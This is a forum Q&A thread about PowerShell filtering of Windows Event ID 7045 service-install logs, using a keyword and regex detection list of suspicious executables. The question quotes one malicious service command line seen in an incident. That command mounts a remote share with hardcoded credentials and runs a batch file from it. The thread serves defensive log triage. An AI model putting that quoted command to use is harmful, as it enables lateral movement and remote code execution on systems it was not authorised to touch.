PowerShell | EVTX | Compare Message with Array (Like)

Time:12-26

Thank you for all the help I've gotten so far, much appreciated. I have been trying to achieve a simple task: to compare the "Image Path" of an Event ID 7045 with a set of pre-defined keywords. The Like isn't working and Compare looks for an exact match.

```powershell
$sus = @('powershell.exe','cmd.exe','psexesvc.exe')
$7045 = Get-WinEvent -FilterHashtable @{ Path="System.evtx"; Id = 7045 } |
    select @{N='Timestamp';E={$_.TimeCreated.ToUniversalTime().ToString('yyyy-MM-ddTHH:mm:ssZ')}},
           Id,
           @{N='Machine Name';E={$_.MachineName}},
           @{N='Service Name';E={$_.Properties[0].Value}},
           @{N='Image Path';E={$_.Properties[1].Value}},
           @{N='RunAsUser';E={$_.Properties[4].Value}},
           @{N='Installed By';E={$_.UserId}} |
    where 'Image Path' -match $sus
```

I mean, if any of the keywords hit a match, I'd be interested!

To give you an idea, one of the many many malicious services installed by a Threat Actor looked like,

```
cmd.exe /c powershell -c "net use \\192.168.100.100 /user:workgroup\test p@ssw0rd123;cmd.exe /c \\192.168.100.100\OutPut\run.bat"
```

So I kinda have many examples, but if there was a way to get the Like operator to work here, fantastic!

Thank you :)

CodePudding user response:

You can use regex -match instead of like. For that, you need to create a regex string from the executables, combining the names with regex 'OR' (|) and escape the dot with a backslash:

```powershell
# create a regex for the suspicious executables:
$sus = '(powershell|cmd|psexesvc)\.exe'
# alternatively you can join the array items like this:
# $sus = ('powershell.exe','cmd.exe','psexesvc.exe' | ForEach-Object {[regex]::Escape($_)}) -join '|'

$7045 = Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7045 } |
        Where-Object { $_.Properties[1].Value -match $sus } |
        Select-Object Id,
                      @{N='Timestamp';E={$_.TimeCreated.ToUniversalTime().ToString('yyyy-MM-ddTHH:mm:ssZ')}},
                      @{N='Machine Name';E={$_.MachineName}},
                      @{N='Service Name'; E={$_.Properties[0].Value}},
                      @{N='Image Path'; E={$_.Properties[1].Value}},
                      @{N='RunAsUser'; E={$_.Properties[4].Value}},
                      @{N='Installed By'; E={$_.UserId}}
```